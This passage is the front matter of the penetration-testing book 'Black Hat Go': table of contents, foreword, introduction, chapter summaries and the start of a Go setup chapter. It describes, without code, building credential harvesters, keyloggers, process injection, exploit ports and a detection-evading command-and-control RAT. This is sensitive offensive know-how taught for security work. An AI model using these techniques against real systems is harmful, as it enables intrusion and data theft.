178 Port Scanning Through SYN-flood Protections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 Checking TCP Flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 Building the BPF Filter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181 Writing the Port Scanner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185 xii Contents in Detail 9 WRITING AND PORTING EXPLOIT CODE 187 Creating a Fuzzer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188 Buffer Overflow Fuzzing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188 SQL Injection Fuzzing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192 Porting Exploits to Go. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196 Porting an Exploit from Python . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197 Porting an Exploit from C. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201 Creating Shellcode in Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 C Transform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Hex Transform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Num Transform. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Raw Transform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215 Base64 Encoding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215 A Note on Assembly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 10 GO PLUGINS AND EXTENDABLE TOOLS 217 Using Go’s Native Plug-in System. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218 Creating the Main Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219 Building a Password-Guessing Plug-in . . . . . . . . . . . . . . . . . . . . . . . . . . . 222 Running the Scanner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224 Building Plug-ins in Lua . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225 Creating the head() HTTP Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226 Creating the get() Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 Registering the Functions with the Lua VM . . . . . . . . . . . . . . . . . . . . . . . . 229 Writing Your Main Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 230 Creating Your Plug-in Script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231 Testing the Lua Plug-in . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232 11 IMPLEMENTING AND ATTACKING CRYPTOGRAPHY 233 Reviewing Basic Cryptography Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234 Understanding the Standard Crypto Library. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Exploring Hashing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Cracking an MD5 or SHA-256 Hash. . . . . . . . . . . . . . . . . . . . . . . . . . . . 236 Implementing bcrypt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 Authenticating Messages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239 Encrypting Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242 Symmetric-Key Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242 Asymmetric Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245 Brute-Forcing RC2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252 Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252 Producing Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255 Performing Work and Decrypting Data . . . . . . . . . . . . . . . . . . . . . . . . . . 257 Writing the Main Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258 Running the Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261 Contents in Detail xiii 12 WINDOWS SYSTEM INTERACTION AND ANALYSIS 263 The Windows API’s OpenProcess() Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263 The unsafe.Pointer and uintptr Types. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266 Performing Process Injection with the syscall Package . . . . . . . . . . . . . . . . . . . . . . . . 268 Defining the Windows DLLs and Assigning Variables . . . . . . . . . . . . . . . . 270 Obtaining a Process Token with the OpenProcess Windows API. . . . . . . . . 271 Manipulating Memory with the VirtualAllocEx Windows API . . . . . . . . . . . 273 Writing to Memory with the WriteProcessMemory Windows API . . . . . . . . 274 Finding LoadLibraryA with the GetProcessAddress Windows API . . . . . . . . 275 Executing the Malicious DLL Using the CreateRemoteThread Windows API. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275 Verifying Injection with the WaitforSingleObject Windows API. . . . . . . . . . 276 Cleaning Up with the VirtualFreeEx Windows API. . . . . . . . . . . . . . . . . . . 277 Additional Exercises . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278 The Portable Executable File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279 Understanding the PE File Format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279 Writing a PE Parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280 Additional Exercises . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289 Using C with Go . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290 Installing a C Windows Toolchain. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290 Creating a Message Box Using C and the Windows API . . . . . . . . . . . . . . 290 Building Go into C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293 13 HIDING DATA WITH STEGANOGRAPHY 295 Exploring the PNG Format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296 The Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296 The Chunk Sequence. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297 Reading Image Byte Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298 Reading the Header Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298 Reading the Chunk Sequence. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299 Writing Image Byte Data to Implant a Payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302 Locating a Chunk Offset. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302 Writing Bytes with the ProcessImage() Method . . . . . . . . . . . . . . . . . . . . . 302 Encoding and Decoding Image Byte Data by Using XOR . . . . . . . . . . . . . . . . . . . . . 307 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312 Additional Exercises . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312 14 BUILDING A COMMAND-AND-CONTROL RAT 315 Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316 Installing Protocol Buffers for Defining a gRPC API. . . . . . . . . . . . . . . . . . . 316 Creating the Project Workspace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317 Defining and Building the gRPC API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317 Creating the Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319 Implementing the Protocol Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319 Writing the main() Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322 Creating the Client Implant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323 xiv Contents in Detail Building the Admin Component . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Running the RAT. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326 Improving the RAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326 Encrypt Your Communications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Handle Connection Disruptions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Register the Implants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Add Database Persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Support Multiple Implants. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Add Implant Functionality. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329 Chain Operating System Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . 329 Enhance the Implant’s Authenticity and Practice Good OPSEC . . . . . . . . . . 329 Add ASCII Art . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330 INDEX 331 FOR E WOR D Programming languages have always had an impact on information security. The design constraints, stan- dard libraries, and protocol implementations avail- able within each language end up defining the attack surface of any application built on them. Security tooling is no different; the right language can sim- plify complex tasks and make the incredibly difficult ones trivial. Go’s cross-platform support, single-binary output, concurrency features, and massive ecosystem make it an amazing choice for security tool development. Go is rewriting the rules for both secure application develop- ment and the creation of security tools, enabling faster, safer, and more portable tooling. Over the 15 years that I worked on the Metasploit Framework, the project went through two full rewrites, changed languages from Perl to Ruby, and now supports a range of multilingual modules, extensions, and payloads. These changes reflect the constantly evolving nature of software development; in order to keep up in security, your tools need to adapt, and xvi Foreword using the right language can save an enormous amount of time. But just like Ruby, Go didn’t become ubiquitous overnight. It takes a leap of faith to build anything of value using a new language, given the uncertainties of the ecosystem and the sheer amount of effort needed to accomplish common tasks before the standard libraries catch up. The authors of Black Hat Go are pioneers in Go security tool develop- ment, responsible for some of the earliest open source Go projects, includ- ing BlackSheepWall, Lair Framework, and sipbrute, among many others. These projects serve as excellent examples of what can be built using the language. The authors are just as comfortable building software as tearing it apart, and this book is a great example of their ability to combine these skills. Black Hat Go provides everything necessary to get started with Go devel- opment in the security space without getting bogged down into the lesser- used language features. Want to write a ridiculous fast network scanner, evil HTTP proxy, or cross-platform command-and-control framework? This book is for you. If you are a seasoned programmer looking for insight into security tool development, this book will introduce the concepts and trade-offs that hackers of all stripes consider when writing tools. Veteran Go developers who are interested in security may learn a lot from the approaches taken here, as building tools to attack other software requires a different mindset than typi- cal application development. Your design trade-offs will likely be substantially different when your goals include bypassing security controls and evading detection. If you already work in offensive security, this book will help you build utilities that are light-years faster than existing solutions. If you work on the defense side or in incident response, this book will give you an idea of how to analyze and defend against malware written in the Go language. Happy hacking! HD Moore Founder of the Metasploit Project and the Critical Research Corporation VP of Research and Development at Atredis Partners ACK NOW L E DG M E N T S This book would not be possible had Robert Griesemer, Rob Pike, and Ken Thompson not created this awesome development language. These folks and the entire core Go development team consistently contribute useful updates upon each release. We would have never writ- ten this book had the language not been so easy and fun to learn and use. The authors would also like to thank the team at No Starch Press: Laurel, Frances, Bill, Annie, Barbara, and everyone else with whom we interacted. You all guided us through the unchartered territory of writing our first book. Life happens—new families, new jobs—and all the while you’ve been patient but still pushed us to complete this book. The entire No Starch Press team has been a pleasure to work with on this project. I would like to thank Jen for all her support, encouragement, and for keep- ing life moving forward while I was locked away in my office nights and weekends, working on this never-ending book. Jen, you helped me more xviii Acknowledgments than you know, and your constant words of encouragement helped make this a reality. I am sincerely grateful to have you in my life. I must thank “T” (my canine quadra-pet) for holding the floor down in my office while I hacked away and reminding me that “outside” is a real place I should visit. Lastly, and close to my heart, I want to dedicate this book to my pups, Luna and Annie, who passed while I was writing this book. You girls were and are everything to me and this book will always be a reminder of my love for you both. Chris Patten I would like to extend a sincere thank you to my wife and best friend, Katie, for your constant support, encouragement, and belief in me. Not a day goes by when I’m not grateful for everything you do for me and our family. I’d like to thank Brooks and Subs for giving me reason to work so hard. There is no better job than being your father. And to the best “Office Hounds” a guy could ask for—Leo (RIP), Arlo, Murphy, and even Howie (yes, Howie too)—you’ve systematically destroyed my house and periodically made me question my life choices, but your presence and companionship mean the world to me. I’ll give each of you a signed copy of this book to chew on. Dan Kottmann Thank you to the love of my life, Jackie, for your love and encouragement; nothing I do would be possible without your support and everything you do for our family. Thank you to my friends and colleagues at Atredis Partners and to anyone I’ve shared a shell with in the past. I am where I am because of you. Thank you to my mentors and friends who have believed in me since day one. There are too many of you to name; I am grateful for the incredible people in my life. Thank you, Mom, for putting me in computer classes (these were a thing). Looking back, those were a complete waste of time and I spent most of the time playing Myst, but it sparked an interest (I miss the 90s). Most importantly, thank you to my Savior, Jesus Christ. Tom Steele It was a long road to get here—almost three years. A lot has happened to get to this point, and here we are, finally. We sincerely appreciate the early feedback we received from friends, colleagues, family, and early-release readers. For your patience, dear reader, thank you so, so very much; we are truly grateful and hope you enjoy this book just as much as we enjoyed writ- ing it. All the best to you! Now Go create some amazing code! IN T RODU C T ION For about six years, the three of us led one of North America’s largest dedicated penetration-testing consulting practices. As principal consultants, we executed technical project work, including network penetration tests, on behalf of our clients—but we also spearheaded the development of better tools, processes, and methodology. And at some point, we adopted Go as one of our primary development languages. Go provides the best features of other programming languages, strik- ing a balance between performance, safety, and user-friendliness. Soon, we defaulted to it as our language of choice when developing tools. Eventually, we even found ourselves acting as advocates of the language, pushing for our colleagues in the security industry to try it. We felt the benefits of Go were at least worthy of consideration. In this book, we’ll take you on a journey through the Go programming language from the perspective of security practitioners and hackers. Unlike other hacking books, we won’t just show you how to automate third-party or commercial tools (although we’ll touch on that a little). Instead, we’ll delve xx Introduction into practical and diverse topics that approach a specific problem, protocol, or tactic useful to adversaries. We’ll cover TCP, HTTP, and DNS communi- cations, interact with Metasploit and Shodan, search filesystems and data- bases, port exploits from other languages to Go, write the core functions of an SMB client, attack Windows, cross-compile binaries, mess with crypto, call C libraries, interact with the Windows API, and much, much more. It’s ambitious! We’d better begin . . . Who This Book Is For This book is for anyone who wants to learn how to develop their own hack- ing tools using Go. Throughout our professional careers, and particularly as consultants, we’ve advocated for programming as a fundamental skill for penetration testers and security professionals. Specifically, the ability to code enhances your understanding of how software works and how it can be broken. Also, if you’ve walked in a developer’s shoes, you’ll gain a more holistic appreciation for the challenges they face in securing software, and you can use your personal experience to better recommend mitigations, eliminate false positives, and locate obscure vulnerabilities. Coding often forces you to interact with third-party libraries and various application stacks and frameworks. For many people (us included), it’s hands-on experience and tinkering that leads to the greatest personal development. To get the most out of this book, we encourage you to clone the book’s official code repository so you have all the working examples we’ll discuss. Find the examples at https://github.com/blackhat-go/bhg/. What This Book Isn’t This book is not an introduction to Go programming in general but an introduction to using Go for developing security tools. We are hackers and then coders—in that order. None of us have ever been software engineers. This means that, as hackers, we put a premium on function over elegance. In many instances, we’ve opted to code as hackers do, disregarding some of the idioms or best practices of software design. As consultants, time is always scarce; developing simpler code is often faster and, therefore, prefer- able over elegance. When you need to quickly create a solution to a problem, style concerns come secondary. This is bound to anger Go purists, who will likely tweet at us that we don’t gracefully handle all error conditions, that our examples could be optimized, or that better constructs or methods are available to produce the desired results. We’re not, in most cases, concerned with teaching you the best, the most elegant, or 100 percent idiomatic solutions, unless doing so will concretely benefit the end result. Although we’ll briefly cover the language syntax, we do so purely to establish a baseline foundation upon which we can build. After all, this isn’t Learning to Program Elegantly with Go—this is Black Hat Go. Introduction xxi Why Use Go for Hacking? Prior to Go, you could prioritize ease of use by using dynamically typed languages—such as Python, Ruby, or PHP—at the expense of performance and safety. Alternatively, you could choose a statically typed language, like C or C++, that offers high performance and safety but isn’t very user- friendly. Go is stripped of much of the ugliness of C, its primary ancestor, making development more user-friendly. At the same time, it’s a statically typed language that produces syntax errors at compile time, increasing your assurance that your code will actually run safely. As it’s compiled, it performs more optimally than interpreted languages and was designed with multicore computing considerations, making concurrent program- ming a breeze. These reasons for using Go don’t concern security practitioners specifi- cally. However, many of the language’s features are particularly useful for hackers and adversaries: Clean package management system Go’s package management solu- tion is elegant and integrated directly with Go’s tooling. Through the use of the go binary, you can easily download, compile, and install pack- ages and dependencies, which makes consuming third-party libraries simple and generally free from conflict. Cross-compilation One of the best features in Go is its ability to cross-compile executables. So long as your code doesn’t interact with raw C, you can easily write code on your Linux or Mac system but com- pile the code in a Windows-friendly, Portable Executable format. Rich standard library Time spent developing in other languages has helped us appreciate the extent of Go’s standard library. Many modern languages lack the standard libraries required to perform many common tasks such as crypto, network communications, database connectivity, and data encoding (JSON, XML, Base64, hex). Go includes many of these critical functions and libraries as part of the language’s standard packaging, reducing the effort necessary to correctly set up your devel- opment environment or to call the functions. Concurrency Unlike languages that have been around longer, Go was released around the same time as the initial mainstream multicore processors became available. For this reason, Go’s concurrency patterns and performance optimizations are tuned specifically to this model. Why You Might Not Love Go We recognize that Go isn’t a perfect solution to every problem. Here are some of the downsides of the language: Binary size ’Nuff said. When you compile a binary in Go, the binary is likely to be multiple megabytes in size. Of course, you can strip debug- ging symbols and use a packer to help reduce the size, but these steps xxii Introduction require attention. This can be a drawback, particularly for security practitioners who need to attach a binary to an email, host it on a shared filesystem, or transfer it over a network. Verbosity While Go is less verbose than languages like C#, Java, or even C/C++, you still might find that the simplistic language construct forces you to be overly expressive for things like lists (called slices in Go), processing, looping, or error handling. A Python one-liner might easily become a three-liner in Go. Chapter Overview The first chapter of this book covers a basic overview of Go’s syntax and philosophy. Next, we start to explore examples that you can leverage for tool development, including various common network protocols like HTTP, DNS, and SMB. We then dig into various tactics and problems that we’ve encoun- tered as penetration testers, addressing topics including data pilfering, packet sniffing, and exploit development. Finally, we take a brief step back to talk about how you can create dynamic, pluggable tools before diving into crypto, attacking Microsoft Windows, and implementing steganography. In many cases, there will be opportunities to extend the tools we show you to meet your specific objectives. Although we present robust examples throughout, our real intent is to provide you with the knowledge and foun- dation through which you can extend or rework the examples to meet your goals. We want to teach you to fish. Before you continue with anything in this book, please note that we— the authors and publisher—have created this content for legal usage only. We won’t accept any liability for the nefarious or illegal things you choose to do. All the content here is for educational purposes only; do not perform any penetration-testing activities against systems or applications without authorized consent. The sections that follow provide a brief overview of each chapter. Chapter 1: Go Fundamentals The goal of this chapter is to introduce the fundamentals of the Go pro- gramming language and provide a foundation necessary for understanding the concepts within this book. This includes an abridged review of basic Go syntax and idioms. We discuss the Go ecosystem, including supporting tools, IDEs, dependency management, and more. Readers new to the pro- gramming language can expect to learn the bare necessities of Go, which will allow them to, hopefully, comprehend, implement, and extend the examples in later chapters. Chapter 2: TCP, Scanners, and Proxies This chapter introduces basic Go concepts and concurrency primitives and patterns, input/output (I/O), and the use of interfaces through practical TCP applications. We’ll first walk you through creating a simple TCP port Introduction xxiii scanner that scans a list of ports using parsed command line options. This will highlight the simplicity of Go code compared to other languages and will develop your understanding of basic types, user input, and error handling. Next, we’ll discuss how to improve the efficiency and speed of this port scanner by introducing concurrent functions. We’ll then introduce I/O by building a TCP proxy—a port forwarder—starting with basic examples and refining our code to create a more reliable solution. Lastly, we’ll re-create Netcat’s “gaping security hole” feature in Go, teaching you how to run oper- ating system commands while manipulating stdin and stdout and redirect- ing them over TCP. Chapter 3: HTTP Clients and Remote Interaction with Tools HTTP clients are a critical component to interacting with modern web server architectures. This chapter shows you how to create the HTTP clients necessary to perform a variety of common web interactions. You’ll handle a variety of formats to interact with Shodan and Metasploit. We’ll also demonstrate how to work with search engines, using them to scrape and parse document metadata so as to extract information useful for organizational profiling activities. Chapter 4: HTTP Servers, Routing, and Middleware This chapter introduces the concepts and conventions necessary for creat- ing an HTTP server. We’ll discuss common routing, middleware, and tem- plating patterns, leveraging this knowledge to create a credential harvester and keylogger. Lastly, we’ll demonstrate how to multiplex command-and- control (C2) connections by building a reverse HTTP proxy. Chapter 5: Exploiting DNS This chapter introduces you to basic DNS concepts using Go. First, we’ll perform client operations, including how to look for particular domain records. Then we’ll show you how to write a custom DNS server and DNS proxy, both of which are useful for C2 operations. Chapter 6: Interacting with SMB and NTLM We’ll explore the SMB and NTLM protocols, using them as a basis for a discussion of protocol implementations in Go. Using a partial implementa- tion of the SMB protocol, we’ll discuss the marshaling and unmarshaling of data, the usage of custom field tags, and more. We’ll discuss and demon- strate how to use this implementation to retrieve the SMB-signing policy, as well as perform password-guessing attacks. Chapter 7: Abusing Databases and Filesystems Pillaging data is a critical aspect of adversarial testing. Data lives in numerous resources, including databases and filesystems. This chapter introduces basic ways to connect to and interact with databases across a xxiv Introduction variety of common SQL and NoSQL platforms. You’ll learn the basics of connecting to SQL databases and running queries. We’ll show you how to search databases and tables for sensitive information, a common technique used during post-exploitation. We’ll also show how to walk filesystems and inspect files for sensitive information. Chapter 8: Raw Packet Processing We’ll show you how to sniff and process network packets by using the gopacket library, which uses libpcap. You’ll learn how to identify available network devices, use packet filters, and process those packets. We will then develop a port scanner that can scan reliably through various protection mechanisms, including syn-flood and syn-cookies, which cause normal port scans to show excessive false positives. Chapter 9: Writing and Porting Exploit Code This chapter focuses almost solely on creating exploits. It begins with creat- ing a fuzzer to discover different types of vulnerabilities. The second half of the chapter discusses how to port existing exploits to Go from other lan- guages. This discussion includes a port of a Java deserialization exploit and the Dirty COW privilege escalation exploit. We conclude the chapter with a discussion on creating and transforming shellcode for use within your Go programs. Chapter 10: Go Plugins and Extendable Tools We’ll introduce two separate methods for creating extendable tools. The first method, introduced in Go version 1.8, uses Go’s native plug-in mecha- nism. We’ll discuss the use cases for this approach and discuss a second approach that leverages Lua to create extensible tools. We’ll demonstrate practical examples showing how to adopt either approach to perform a common security task. Chapter 11: Implementing and Attacking Cryptography This chapter covers the fundamental concepts of symmetric and asymmetric cryptography using Go. This information focuses on using and understand- ing cryptography through the standard Go package. Go is one of the few languages that, instead of using a third-party library for encryption, uses a native implementation within the language. This makes the code easy to navigate, modify, and understand. We’ll explore the standard library by examining common use cases and creating tools. The chapter will show you how to perform hashing, message authentication, and encryption. Lastly, we’ll demonstrate how to brute- force decrypt an RC2-encrypted ciphertext. Introduction xxv Chapter 12: Windows System Interaction and Analysis In our discussion on attacking Windows, we’ll demonstrate methods of inter- acting with the Windows native API, explore the syscall package in order to perform process injection, and learn how to build a Portable Executable (PE) binary parser. The chapter will conclude with a discussion of calling native C libraries through Go’s C interoperability mechanisms. Chapter 13: Hiding Data with Steganography Steganography is the concealment of a message or file within another file. This chapter introduces one variation of steganography: hiding arbitrary data within a PNG image file’s contents. These techniques can be useful for exfiltrating information, creating obfuscated C2 messages, and bypassing detective or preventative controls. Chapter 14: Building a Command-and-Control RAT The final chapter discusses practical implementations of command-and- control (C2) implants and servers in Go. We’ll leverage the wisdom and knowledge gained in previous chapters to build a C2 channel. The C2 client/server implementation will, by nature of being custom-made, avoid signature-based security controls and attempt to circumvent heuristics and network-based egress controls. This chapter will guide you through the process of setting up your Go development environment and introduce you to the language’s syntax. People have written entire books on the fundamental mechanics of the language; this chapter covers the most basic concepts you’ll need in order to work through the code examples in the following chapters. We’ll cover everything from primitive data types to implementing concurrency. For readers who are already well versed in the language, you’ll find much of this chapter to be a review. Setting Up a Development Environment To get started with Go, you’ll need a functional development environment. In this section, we’ll walk you through the steps to download Go and set up your workspace and environment variables. We’ll discuss various options for your integrated development environment and some of the standard tooling that comes with Go. 1 GO F U N DA M E N TA L S 2 Chapter 1 Downloading and Installing Go Start by downloading the Go binary release most appropriate to your oper- ating system and architecture from https://golang.org/dl/. Binaries exist for Windows, Linux, and macOS. If you’re using a system that doesn’t have an available precompiled binary, you can download the Go source code from that link. Execute the binary and follow the prompts, which will be minimal, in order to install the entire set of Go core packages. Packages, called libraries in most other languages, contain useful code you can use in your Go programs. Setting GOROOT to Define the Go Binary Location Next, the operating system needs to know how to find the Go installation. In most instances, if you’ve installed Go in the default path, such as /usr /local/go on a *Nix/BSD-based system, you don’t have to take any action here. However, in the event that you’ve chosen to install Go in a nonstandard path or are installing Go on Windows, you’ll need to tell the operating system where to find the Go binary. You can do this from your command line by setting the reserved GOROOT environment variable to the location of your binary. Setting environment variables is operating-system specific. On Linux or macOS, you can add this to your ~/.profile: set GOROOT=/path/to/go On Windows, you can add this environment variable through the System (Control Panel), by clicking the Environment Variables button. Setting GOPATH to Determine the Location of Your Go Workspace Unlike setting your GOROOT, which is necessary in only certain installation scenarios, you must always define an environment variable named GOPATH to instruct the Go toolset where your source code, third-party libraries, and compiled programs will exist. This can be any location of your choos- ing. Once you’ve chosen or created this base workspace directory, create the following three subdirectories within: bin, pkg, and src (more on these directories shortly). Then, set an environment variable named GOPATH that points to your base workspace directory. For example, if you want to place your projects in a directory called gocode located within your home directory on Linux, you set GOPATH to the following: GOPATH=$HOME/gocode The bin directory will contain your compiled and installed Go execut- able binaries. Binaries that are built and installed will be automatically placed into this location. The pkg directory stores various package objects, including third-party Go dependencies that your code might rely on. For Go Fundamentals 3 example, perhaps you want to use another developer’s code that more elegantly handles HTTP routing. The pkg directory will contain the binary artifacts necessary to consume their implementation in your code. Finally, the src directory will contain all the evil source code you’ll write. The location of your workspace is arbitrary, but the directories within must match this naming convention and structure. The compilation, build, and package management commands you’ll learn about later in this chapter all rely on this common directory structure. Without this important setup, Go projects won’t compile or be able to locate any of their necessary dependencies! After configuring the necessary GOROOT and GOPATH environment vari- ables, confirm that they’re properly set. You can do this on Linux and Windows via the set command. Also, check that your system can locate the binary and that you’ve installed the expected Go version with the go version command: $ go version go version go1.11.5 linux/amd64 This command should return the version of the binary you installed. Choosing an Integrated Development Environment Next, you’ll probably want to select an integrated development environ- ment (IDE) in which to write your code. Although an IDE isn’t required, many have features that help reduce errors in your code, add version- control shortcuts, aid in package management, and more. As Go is still a fairly young language, there may not be as many mature IDEs as for other languages. Fortunately, advancements over the last few years leave you with sev- eral, full-featured options. We’ll review some of them in this chapter. For a more complete list of IDE or editor options, check out the Go wiki page at https://github.com/golang/go/wiki/IDEsAndTextEditorPlugins/. This book is IDE/editor agnostic, meaning we won’t force you into any one solution. Vim Editor The Vim text editor, available in many operating-system distributions, pro- vides a versatile, extensible, and completely open source development envi- ronment. One appealing feature of Vim is that it lets users run everything from their terminal without fancy GUIs getting in the way. Vim contains a vast ecosystem of plug-ins through which you can cus- tomize themes, add version control, define snippets, add layout and code- navigation features, include autocomplete, perform syntax highlighting and linting, and much, much more. Vim’s most common plug-in management systems include Vundle and Pathogen. To use Vim for Go, install the vim-go plug-in (https://github.com/fatih/vim-go/) shown in Figure 1-1. 4 Chapter 1 Figure 1-1: The vim-go plug-in Of course, to use Vim for Go development, you’ll have to become com- fortable with Vim. Further, customizing your development environment with all the features you desire might be a frustrating process. If you use Vim, which is free, you’ll likely need to sacrifice some of the conveniences of commercial IDEs. GitHub Atom GitHub’s IDE, called Atom (https://atom.io/), is a hackable text editor with a large offering of community-driven packages. Unlike Vim, Atom provides a dedicated IDE application rather than an in-terminal solution, as shown in Figure 1-2. Figure 1-2: Atom with Go support Go Fundamentals 5 Like Vim, Atom is free. It provides tiling, package management, version control, debugging, autocomplete, and a myriad of additional features out of the box or through the use of the go-plus plug-in, which provides dedi- cated Go support (https://atom.io/packages/go-plus/). Microsoft Visual Studio Code Microsoft’s Visual Studio Code, or VS Code (https://code.visualstudio.com), is arguably one of the most feature-rich and easiest IDE applications to con- figure. VS Code, shown in Figure 1-3, is completely open source and distrib- uted under an MIT license. Figure 1-3: The VS Code IDE with Go support VS Code supports a diverse set of extensions for themes, versioning, code completion, debugging, linting, and formatting. You can get Go inte- gration with the vscode-go extension (https://github.com/Microsoft/vscode-go/). JetBrains GoLand The JetBrains collection of development tools are efficient and feature-rich, making both professional development and hobbyist projects easy to accom- plish. Figure 1-4 shows what the JetBrains GoLand IDE looks like. GoLand is the JetBrains commercial IDE dedicated to the Go language. Pricing for GoLand ranges from free for students, to $89 annually for indi- viduals, to $199 annually for organizations. GoLand offers all the expected features of a rich IDE, including debugging, code completion, version con- trol, linting, formatting, and more. Although paying for a product may not sound appealing, commercial products such as GoLand typically have official support, documentation, timely bug fixes, and some of the other assurances that come with enterprise software. 6 Chapter 1 Figure 1-4: The GoLand commercial IDE Using Common Go Tool Commands Go ships with several useful commands that simplify the development pro- cess. The commands themselves are commonly included in IDEs, making the tooling consistent across development environments. Let’s take a look at some of these commands. The go run Command One of the more common commands you’ll execute during development, go run will compile and execute the main package—your program’s entry point. As an example, save the following code under a project directory within 